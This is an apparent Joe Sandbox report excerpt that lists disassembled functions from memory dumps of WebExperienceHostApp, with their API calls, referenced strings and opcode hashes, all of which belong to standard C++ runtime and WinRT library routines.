Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnswprintf_s
String ID: %.0Lf
API String ID: 296878162-1402515088
Opcode ID: 3b16c76f99806dfa4a0cf6affe3c77ff5d81f2a5c6144b3f11b4eac95df9b14a
Instruction ID: 15b334a35412221966cb8916e3769d208b228914ecaea7a97f649ac6bc40e85b
Opcode Fuzzy Hash: 3b16c76f99806dfa4a0cf6affe3c77ff5d81f2a5c6144b3f11b4eac95df9b14a
Instruction Fuzzy Hash: A7717D22B0AA8585EB11EBA6E4406AD73A1EF84B98F084136DF5D67B69EF3CD445C340

Function 00007FFE007CD760 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON

Download Yara Rule

APIs

swprintf_s.PGOCR ref: 00007FFE007CD7FD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007CD9B0

Strings

%.0Lf, xrefs: 00007FFE007CD7ED

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnswprintf_s
String ID: %.0Lf
API String ID: 296878162-1402515088
Opcode ID: b571ce2853cddf76524b4741eca339f0dced9dcfb565cacf30ea4cebfa2c42ba
Instruction ID: 2ff71be812738915b6a0d3f2c8ef469509176aa594e4ced42ba1766766871034
Opcode Fuzzy Hash: b571ce2853cddf76524b4741eca339f0dced9dcfb565cacf30ea4cebfa2c42ba
Instruction Fuzzy Hash: 4171AF22B0AB8589EB11EB65E4406AD73B1EF94B98F094136EF4D63B69DF3CD445C340

Function 00007FFE007D9990 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FFE007D9999

Strings

invalid random_device value, xrefs: 00007FFE007D99AC

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: rand_s
String ID: invalid random_device value
API String ID: 863162693-3926945683
Opcode ID: 5bf917cb6cc27b8f8c101cf21685ef46c4f3be592fb91b1d19001d2cd564a4a4
Instruction ID: 8d305b3678ac8b00c47cad308f1198607638a9cd95cdff8b7e28e6512ab8a1ba
Opcode Fuzzy Hash: 5bf917cb6cc27b8f8c101cf21685ef46c4f3be592fb91b1d19001d2cd564a4a4
Instruction Fuzzy Hash: B851D322D1AE8685F252BF3494511BA6374BF55384F1D8733E78E367B9DF2CB4928200

Function 00007FFE1A454730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4523AE), ref: 00007FFE1A45677E

_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE1A454806
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A454864

Strings

csm, xrefs: 00007FFE1A45490A

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: abort$CreateFrameInfo
String ID: csm
API String ID: 2697087660-1018135373
Opcode ID: 809b0197d0f15b3009e55adb189ff641ea3fee3a4527357fb56d218a418e2097
Instruction ID: fcf65bcb66550e6941e1f32dacb37d3dec130f75e1aee59438e518ddd4cda979
Opcode Fuzzy Hash: 809b0197d0f15b3009e55adb189ff641ea3fee3a4527357fb56d218a418e2097
Instruction Fuzzy Hash: 7B514FB6719B4186D660AF26E44027E77B5FB89FA0F1401B6DB8D07B66CF38D461CB00

Function 00007FFE007B3440 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

WindowsCreateStringReference.API-MS-WIN-CORE-WINRT-STRING-L1-1-0 ref: 00007FFE007B35E4
RoGetActivationFactory.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FFE007B361D

Strings

Windows.Foundation.Diagnostics.AsyncCausalityTracer, xrefs: 00007FFE007B35DD

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ActivationCreateFactoryReferenceStringWindows
String ID: Windows.Foundation.Diagnostics.AsyncCausalityTracer
API String ID: 1966789792-167870777
Opcode ID: 7c7924330cc76eb3eba570e8f5a043d3487a3d96d7dca579302cae01b3451e79
Instruction ID: 824d6ca820673f68beb907537dfdcdbb546ea64b147881d830978ca988600005
Opcode Fuzzy Hash: 7c7924330cc76eb3eba570e8f5a043d3487a3d96d7dca579302cae01b3451e79
Instruction Fuzzy Hash: 07317E22B1AA8692EB14EB25D4543B92360FF89B88F594032DB5D477B9DF3DE681C700

Function 00007FFE007B36D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007B37E0
CoGetObjectContext.API-MS-WIN-CORE-COM-L1-1-0 ref: 00007FFE007B3803

Strings

Context callback failed., xrefs: 00007FFE007B37C3

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ContextExceptionObjectThrow
String ID: Context callback failed.
API String ID: 1677907432-1244723342
Opcode ID: e19a649699645cc43410b51faacb8ed42f9f502b8979f275351cd23fa70905b7
Instruction ID: 657254906cf2250beb8e171a59edbb8b470b94ec73c163f26b2293a252010d46
Opcode Fuzzy Hash: e19a649699645cc43410b51faacb8ed42f9f502b8979f275351cd23fa70905b7
Instruction Fuzzy Hash: 2A316EA2A0AE0682EF54AF25E8907793360FF44B84F594036DB4D867B8DF3CE595C740

Function 00007FFE007A3280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE007A32B5

Part of subcall function 00007FFE007F2B1C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007A5AA8), ref: 00007FFE007F2B36

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE007A57AA,?,?,?,00007FFE007A43F8), ref: 00007FFE007A32AE

Strings

ios_base::failbit set, xrefs: 00007FFE007A32CE

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID: ios_base::failbit set
API String ID: 1934640635-3924258884
Opcode ID: 86b4e5238144139d03474f40a88081f60eccb49d5d50e335382d98dbc759b6c8
Instruction ID: c32d7649b6bdd3ff43a4f062fed3f75919b1abb04a85a76c49ae0dc81fef7740
Opcode Fuzzy Hash: 86b4e5238144139d03474f40a88081f60eccb49d5d50e335382d98dbc759b6c8
Instruction Fuzzy Hash: 65218721B0EB8195DE60EF11E5402AAA394FB89BE0F584635FF9C43BA9EF3CD5558700

Function 00007FFE1A4598C8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4599C6

Strings

void , xrefs: 00007FFE1A459950
void, xrefs: 00007FFE1A459928

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: void$void
API String ID: 2943138195-3746155364
Opcode ID: 1fd1239767cdba175521d54b038567421754ad18fe50b3a3e7fd3ac15f670715
Instruction ID: 2b8e4c2d3143c69586e6a6a7a8ca688ae381d2a92afdcf972e3ef60b12039e66
Opcode Fuzzy Hash: 1fd1239767cdba175521d54b038567421754ad18fe50b3a3e7fd3ac15f670715
Instruction Fuzzy Hash: 693157A6F18F5598FB01DBA2E8400FC77B0BB49B58B4401B6DE4E53B6ADF389164C740

Function 00007FFE007AF220 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFE007AC674), ref: 00007FFE007AF244

Part of subcall function 00007FFE007DBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB00
Part of subcall function 00007FFE007DBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB08
Part of subcall function 00007FFE007DBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB11
Part of subcall function 00007FFE007DBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB2D

Strings

true, xrefs: 00007FFE007AF2B3
false, xrefs: 00007FFE007AF29C

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funclocaleconv
String ID: false$true
API String ID: 2502581279-2658103896
Opcode ID: 9b59a3e52013d521e33c9098de8e5753f24b95a6832a3519e6095e988c635fb6
Instruction ID: ce36920a4047d383c119dcc4a602bb5748982806bfb0aa04838ba3ec5e9116a2
Opcode Fuzzy Hash: 9b59a3e52013d521e33c9098de8e5753f24b95a6832a3519e6095e988c635fb6
Instruction Fuzzy Hash: 1521712650AB8581E720EF21E4513AA77B0FB98798F494536DB8D0736ECF3CD155C780

Function 00007FFE007B35A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

WindowsCreateStringReference.API-MS-WIN-CORE-WINRT-STRING-L1-1-0 ref: 00007FFE007B35E4
RoGetActivationFactory.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FFE007B361D

Strings

Windows.Foundation.Diagnostics.AsyncCausalityTracer, xrefs: 00007FFE007B35DD

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ActivationCreateFactoryReferenceStringWindows
String ID: Windows.Foundation.Diagnostics.AsyncCausalityTracer
API String ID: 1966789792-167870777
Opcode ID: 44bba69f27772335a2dabfed7dfb8568543d36035e0c3b799b1208cc61387a4d
Instruction ID: 797b51e7cfdf4792cc720d26a53e20644d41601a4bcd8262cd797071d6f0d4ed
Opcode Fuzzy Hash: 44bba69f27772335a2dabfed7dfb8568543d36035e0c3b799b1208cc61387a4d
Instruction Fuzzy Hash: 63219A22B1AA8A82EB10DB29E4543793360FF49B88F590136DB4D4B779CF3DE644C700

Function 00007FFE1A45608F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456430: RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE1A456474
Part of subcall function 00007FFE1A456430: RaiseException.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFE1A4564BA

RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE1A4560FF

Strings

Access violation - no RTTI data!, xrefs: 00007FFE1A45608F
Bad dynamic_cast!, xrefs: 00007FFE1A4560B2

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: FileHeader$ExceptionRaise
String ID: Access violation - no RTTI data!$Bad dynamic_cast!
API String ID: 3685223789-3176238549
Opcode ID: a6639cd7f69626a89f4ca9d3667c59b83a4044ca09e137da1a34bb00ff92109c
Instruction ID: d283840275daaeeab74e8fca3ca5ae1794ff35d434b7ba299e2b2228425175ae
Opcode Fuzzy Hash: a6639cd7f69626a89f4ca9d3667c59b83a4044ca09e137da1a34bb00ff92109c
Instruction Fuzzy Hash: 80015EA1B29E4791EE40AB16E451278A321FF40FA4F8450F3D65E4767AEF6CD568C700

Function 00007FFE007A4664 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

__std_exception_copy.VCRUNTIME140_APP ref: 00007FFE007A468C

Strings

Vz, xrefs: 00007FFE007A4691
Vz, xrefs: 00007FFE007A469B

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: __std_exception_copy
String ID: Vz$ Vz
API String ID: 592178966-1883826463
Opcode ID: eeda7a81354d959ff5dcd7f3cc2f4c04538c781562ddcfa46482a9261517d49f
Instruction ID: 65b1820eb832c3aea3f59b1ef46576a7dba685f8953e17343146fca54ad41766
Opcode Fuzzy Hash: eeda7a81354d959ff5dcd7f3cc2f4c04538c781562ddcfa46482a9261517d49f
Instruction Fuzzy Hash: EBF03072E0AB8190D7059F15E5800B87324FB68B44B58D131DB5C12325EF3CD5E4C340

Function 00007FFE007A474C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

__std_exception_copy.VCRUNTIME140_APP ref: 00007FFE007A4774

Strings

Vz, xrefs: 00007FFE007A4779
Vz, xrefs: 00007FFE007A4783

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: __std_exception_copy
String ID: Vz$ Vz
API String ID: 592178966-1883826463
Opcode ID: 1671d71038be9c9497c04db3728284d0d862222d1263297ef78ca9999c5eddd0
Instruction ID: f6310b56e660d794c4ff4abf8e5ec4f55b9b4792dd7fb41a45926572f4867905
Opcode Fuzzy Hash: 1671d71038be9c9497c04db3728284d0d862222d1263297ef78ca9999c5eddd0
Instruction Fuzzy Hash: 0BF0D072E1AB8591D7059F15E5800B97325FB68B44B58D131DB5C16335EF3CD5E5C340

Function 00007FFE1A45E720 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A45E970: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1A45EA30
Part of subcall function 00007FFE1A45E970: RtlUnwindEx.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0(?,?,?,?,?,?,?,00007FFE1A45E735), ref: 00007FFE1A45EA7F

Part of subcall function 00007FFE1A456770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4523AE), ref: 00007FFE1A45677E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45E75A

Strings

csm, xrefs: 00007FFE1A45E73B
f, xrefs: 00007FFE1A45E735

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: CurrentImageNonwritableUnwindabortterminate
String ID: csm$f
API String ID: 4189928240-629598281
Opcode ID: 6b267538cdc2106bb9cc523324cb098b503f0df6c4cb79035cd1b191454f8ac5
Instruction ID: a9209a2b0b308ad7549e5904c37833daaf7b600864b98194555ac17cf668f5a1
Opcode Fuzzy Hash: 6b267538cdc2106bb9cc523324cb098b503f0df6c4cb79035cd1b191454f8ac5
Instruction Fuzzy Hash: 3FE06CF5E08B4281DB707B12B14517D66B5AF05FB4F14C0F6D64C07666CE3CD8708641

Function 00007FFE007A69E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE007A69ED

Part of subcall function 00007FFE007A4D90: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007B71DD,?,?,?,?,?,?,?,?,?,00007FFE007BB15E), ref: 00007FFE007A4DB9
Part of subcall function 00007FFE007A4D90: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007B71DD,?,?,?,?,?,?,?,?,?,00007FFE007BB15E), ref: 00007FFE007A4DE8
Part of subcall function 00007FFE007A4D90: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFE007B71DD,?,?,?,?,?,?,?,?,?,00007FFE007BB15E), ref: 00007FFE007A4DFF

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A6A0A

Strings

:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FFE007A6A15

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free$Getmonthsmallocmemcpy
String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece
API String ID: 1628830074-2030377133
Opcode ID: 27da167e1864dcdf294359a8b0a44747903f76c57d9256877098d303ea31171d
Instruction ID: 0cd60bda2be5612943fe19ee1a7ddb03b6c0622a9c57a2a35dead512a4c3d7a4
Opcode Fuzzy Hash: 27da167e1864dcdf294359a8b0a44747903f76c57d9256877098d303ea31171d
Instruction Fuzzy Hash: 6CE0392171AA0181EA40AB21F4843796364EF44B84F885030EB0E56769DF3CD8C4C380

Function 00007FFE007A6990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE007A699D

Part of subcall function 00007FFE007A4D90: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007B71DD,?,?,?,?,?,?,?,?,?,00007FFE007BB15E), ref: 00007FFE007A4DB9
Part of subcall function 00007FFE007A4D90: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007B71DD,?,?,?,?,?,?,?,?,?,00007FFE007BB15E), ref: 00007FFE007A4DE8
Part of subcall function 00007FFE007A4D90: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFE007B71DD,?,?,?,?,?,?,?,?,?,00007FFE007BB15E), ref: 00007FFE007A4DFF

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A69BA

Strings

:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFE007A69C5

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free$Getdaysmallocmemcpy
String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
API String ID: 1347072587-3283725177
Opcode ID: f597a48114be3c6915887c42bc8e5feb8ace438d66b9616608920e23ae2e9610
Instruction ID: 3d73db1b01cb3dda1949fa22be0b01d84b285a83839b159ec10d01445bb7c39c
Opcode Fuzzy Hash: f597a48114be3c6915887c42bc8e5feb8ace438d66b9616608920e23ae2e9610
Instruction Fuzzy Hash: 81E0392260AB0181EB10AF11E48437963B0EF48B94F991134EB0D46769DF3CD884C740

Function 00007FFE007A62E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE007A62ED

Part of subcall function 00007FFE007A4D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D32
Part of subcall function 00007FFE007A4D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D58
Part of subcall function 00007FFE007A4D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D70

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A630A

Strings

:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFE007A6315

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
